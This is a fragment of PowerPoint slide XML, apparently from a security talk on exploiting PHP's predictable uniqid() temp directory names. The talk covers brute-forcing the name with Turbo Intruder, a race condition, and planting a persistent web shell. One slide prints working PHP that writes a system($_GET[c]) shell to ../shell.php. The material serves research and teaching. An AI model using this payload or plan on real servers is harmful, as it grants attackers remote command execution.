                    <a:pt x="3472688" y="5624195"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3472688" y="5624195"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3106293" y="5580126"/>
                    <a:pt x="2732913" y="5527167"/>
                    <a:pt x="2359914" y="5469636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1837817" y="5388991"/>
                    <a:pt x="1318006" y="5297043"/>
                    <a:pt x="801117" y="5189220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="565658" y="5139944"/>
                    <a:pt x="330708" y="5087493"/>
                    <a:pt x="96521" y="5031232"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5006213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5081524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91313" y="5104765"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="605155" y="5228209"/>
                    <a:pt x="1123188" y="5332984"/>
                    <a:pt x="1644650" y="5424678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2144903" y="5511927"/>
                    <a:pt x="2646807" y="5588889"/>
                    <a:pt x="3150235" y="5655818"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3598799" y="5715889"/>
                    <a:pt x="4048252" y="5768721"/>
                    <a:pt x="4498467" y="5814441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4931664" y="5858510"/>
                    <a:pt x="5363464" y="5904738"/>
                    <a:pt x="5796407" y="5946013"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6203950" y="5985002"/>
                    <a:pt x="6612637" y="6012180"/>
                    <a:pt x="7021830" y="6028817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7338695" y="6042151"/>
                    <a:pt x="7655433" y="6060694"/>
                    <a:pt x="7972298" y="6077203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8078089" y="6083300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8484997" y="6083300"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8521446" y="6078220"/>
                    <a:pt x="8558276" y="6075680"/>
                    <a:pt x="8595106" y="6075680"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8609711" y="6075680"/>
                    <a:pt x="8624443" y="6076061"/>
                    <a:pt x="8639048" y="6076950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8842375" y="6070853"/>
                    <a:pt x="9045956" y="6065646"/>
                    <a:pt x="9249537" y="6058281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9662922" y="6043421"/>
                    <a:pt x="10075672" y="6019546"/>
                    <a:pt x="10488422" y="5989701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10806049" y="5966714"/>
                    <a:pt x="11123422" y="5938012"/>
                    <a:pt x="11440414" y="5907786"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11711559" y="5881243"/>
                    <a:pt x="11981815" y="5849239"/>
                    <a:pt x="12252198" y="5814949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12608179" y="5769737"/>
                    <a:pt x="12963271" y="5718302"/>
                    <a:pt x="13317347" y="5660136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13743432" y="5590539"/>
                    <a:pt x="14167231" y="5510402"/>
                    <a:pt x="14589252" y="5419978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14987905" y="5334634"/>
                    <a:pt x="15383638" y="5240019"/>
                    <a:pt x="15776321" y="5133594"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4994275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4921250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16002000" y="4996053"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15399893" y="5166106"/>
                    <a:pt x="14790547" y="5309489"/>
                    <a:pt x="14175867" y="5431028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13667358" y="5531231"/>
                    <a:pt x="13156437" y="5617591"/>
                    <a:pt x="12643103" y="5690108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12263500" y="5743448"/>
                    <a:pt x="11883009" y="5789676"/>
                    <a:pt x="11501247" y="5828792"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11037443" y="5877179"/>
                    <a:pt x="10572623" y="5914771"/>
                    <a:pt x="10107422" y="5944743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9798939" y="5964555"/>
                    <a:pt x="9490075" y="5980811"/>
                    <a:pt x="9180830" y="5988050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9159112" y="5988558"/>
                    <a:pt x="9137649" y="5992114"/>
                    <a:pt x="9116186" y="5992114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9102217" y="5992114"/>
                    <a:pt x="9087738" y="5994400"/>
                    <a:pt x="9073768" y="5994400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9072117" y="5994400"/>
                    <a:pt x="9070466" y="5994400"/>
                    <a:pt x="9068815" y="5994273"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9056115" y="5991860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9250679" y="5976620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9271380" y="5973953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10290555" y="5886196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10621136" y="5853811"/>
                    <a:pt x="10951336" y="5819648"/>
                    <a:pt x="11280647" y="5779516"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11711050" y="5726811"/>
                    <a:pt x="12140310" y="5667248"/>
                    <a:pt x="12568427" y="5601081"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13015340" y="5532374"/>
                    <a:pt x="13460476" y="5454269"/>
                    <a:pt x="13903959" y="5367274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14464156" y="5257419"/>
                    <a:pt x="15020923" y="5132451"/>
                    <a:pt x="15572867" y="4988941"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15744444" y="4945126"/>
                    <a:pt x="15915258" y="4899025"/>
                    <a:pt x="16085438" y="4850765"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="4799838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16256000" y="0"/>
                  </a:ln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8" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732240" y="4791960"/>
            <a:ext cx="4562640" cy="1229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3229"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="30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– </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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229"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="30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pseudo random dir name</a:t>
            </a:r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TextBox 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6345000" y="4884840"/>
            <a:ext cx="4885560" cy="387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3050"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2180" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>uniqid() is used to create a temp dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="218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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6116400" y="4888080"/>
            <a:ext cx="98640" cy="381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3008"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2180" b="0" strike="noStrike" spc="-18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218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Box 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6345000" y="5411880"/>
            <a:ext cx="5117400" cy="381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3005"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="7">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>uniqid() is not a crypto secure function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871160" y="6279480"/>
            <a:ext cx="225900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Box 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6116400" y="5412240"/>
            <a:ext cx="98640" cy="381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3008"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2180" b="0" strike="noStrike" spc="-18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218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55" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5300640" y="0"/>
            <a:ext cx="6890760" cy="6857640"/>
            <a:chOff x="5300640" y="0"/>
            <a:chExt cx="6890760" cy="6857640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5300640" y="0"/>
              <a:ext cx="6890760" cy="6857640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 6890760"/>
                <a:gd name="textAreaRight" fmla="*/ 6891120 w 6890760"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 6857640"/>
                <a:gd name="textAreaBottom" fmla="*/ 6858000 h 6857640"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="9188196" h="9144000">
                  <a:moveTo>
                    <a:pt x="1489202" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1346200" y="262128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1085850" y="764413"/>
                    <a:pt x="867156" y="1288161"/>
                    <a:pt x="680212" y="1828292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389255" y="2676271"/>
                    <a:pt x="188468" y="3552444"/>
                    <a:pt x="81026" y="4441952"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24892" y="4897247"/>
                    <a:pt x="0" y="5351907"/>
                    <a:pt x="35306" y="5809869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77216" y="6345301"/>
                    <a:pt x="140462" y="6877304"/>
                    <a:pt x="247523" y="7403973"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365760" y="7985252"/>
                    <a:pt x="526288" y="8552815"/>
                    <a:pt x="738251" y="9104376"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="754888" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825119" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815975" y="9122029"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="698754" y="8818626"/>
                    <a:pt x="596392" y="8507730"/>
                    <a:pt x="506603" y="8190230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="428498" y="7913751"/>
                    <a:pt x="370967" y="7631557"/>
                    <a:pt x="304292" y="7351903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302641" y="7337044"/>
                    <a:pt x="301879" y="7322058"/>
                    <a:pt x="301752" y="7307199"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301752" y="7307199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="350647" y="7476744"/>
                    <a:pt x="389763" y="7626350"/>
                    <a:pt x="435864" y="7773797"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="556260" y="8157845"/>
                    <a:pt x="695071" y="8531352"/>
                    <a:pt x="852932" y="8894064"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="970026" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188196" y="9144000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9188196" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655318" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527048" y="198247"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1351407" y="487299"/>
                    <a:pt x="1191895" y="786003"/>
                    <a:pt x="1046480" y="1093216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1039368" y="1111377"/>
                    <a:pt x="1027684" y="1127252"/>
                    <a:pt x="1012444" y="1139317"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1012444" y="1139317"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1032129" y="1093216"/>
                    <a:pt x="1051052" y="1046734"/>
                    <a:pt x="1070991" y="1000506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1152398" y="811657"/>
                    <a:pt x="1238504" y="625602"/>
                    <a:pt x="1329563" y="442341"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1566164" y="0"/>
                  </a:ln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7" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="732240" y="848520"/>
            <a:ext cx="4574160" cy="1494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5885"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="42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PHP uniqid() implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659520" y="2642400"/>
            <a:ext cx="4488120" cy="262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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Uniqid() relies on seconds and microseconds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="215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15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5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Both are deterministic and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150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bruteforce-able </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="215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15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5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150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Let's read some PHP internals code for fun &amp; profit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="215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TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655200" y="1375200"/>
            <a:ext cx="4773600" cy="1201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728"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="44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-  Exploitation plan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Box 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4921560" y="6394320"/>
            <a:ext cx="214776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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881680" y="762480"/>
            <a:ext cx="5519520" cy="61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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>We need to find the name of the temp dir where our file is written(1st step)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881680" y="1712520"/>
            <a:ext cx="5519520" cy="92333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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>We need to make sure the file we download will execute sleep for some time so we can guess the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881680" y="2967480"/>
            <a:ext cx="5519520" cy="61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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>We’ll use Turbo Intruder to bruteforce and guess the temp dir name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881680" y="3861360"/>
            <a:ext cx="5610960" cy="92333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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Our download file + temp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> will get deleted so we need to write a permanent shell for persistence </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5881680" y="4994280"/>
            <a:ext cx="5610960" cy="915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343080" indent="-343080" defTabSz="914400">
              <a:lnSpc>
                <a:spcPts val="2404"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="5F4776"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="4">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>How do we trigger our download file before it gets deleted? (2nd race condition)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="215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Box 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="919080" y="691200"/>
            <a:ext cx="11020320" cy="343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704"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="541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–temporary shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911160" y="1769400"/>
            <a:ext cx="10773000" cy="305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404"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2150" b="0" strike="noStrike" spc="1">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="Calibri (MS)"/>
                <a:ea typeface="Calibri (MS)"/>
              </a:rPr>
              <a:t>Temp shell written first which will write a perm shell in the parent dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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TextBox 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4625280" y="6230520"/>
            <a:ext cx="216288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TextBox 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916560" y="2651040"/>
            <a:ext cx="9451440" cy="3015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968"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>set_time_limit(0); </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>sleep(35); </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>echo '&lt;?php file_put_contents("../shell.php","&lt;?phpsystem(\$_GET[c]) ;");'; </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>echo '?&gt;' . str_repeat("A",50000000); </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>flush(); </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>ob_flush(); </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1900"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="0" strike="noStrike" spc="-12">
                <a:solidFill>
                  <a:srgbClr val="5F4776"/>
                </a:solidFill>
                <a:latin typeface="IBM Plex Sans Condensed"/>
                <a:ea typeface="IBM Plex Sans Condensed"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="19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73" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="3421800"/>
            <a:ext cx="2264040" cy="1160640"/>
            <a:chOff x="685800" y="3421800"/>
            <a:chExt cx="2264040" cy="1160640"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Freeform 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="3513960"/>
              <a:ext cx="2264040" cy="1068480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 2264040"/>
                <a:gd name="textAreaRight" fmla="*/ 2264400 w 2264040"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1068480"/>
                <a:gd name="textAreaBottom" fmla="*/ 1068840 h 1068480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
              <a:pathLst>
                <a:path w="936433" h="442052">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="733233" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936433" y="221026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733233" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="2210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477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75" name="TextBox 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1115640" y="3421800"/>
              <a:ext cx="1649880" cy="1160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1678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76" name="TextBox 6"/>
          <p:cNvSpPr/>
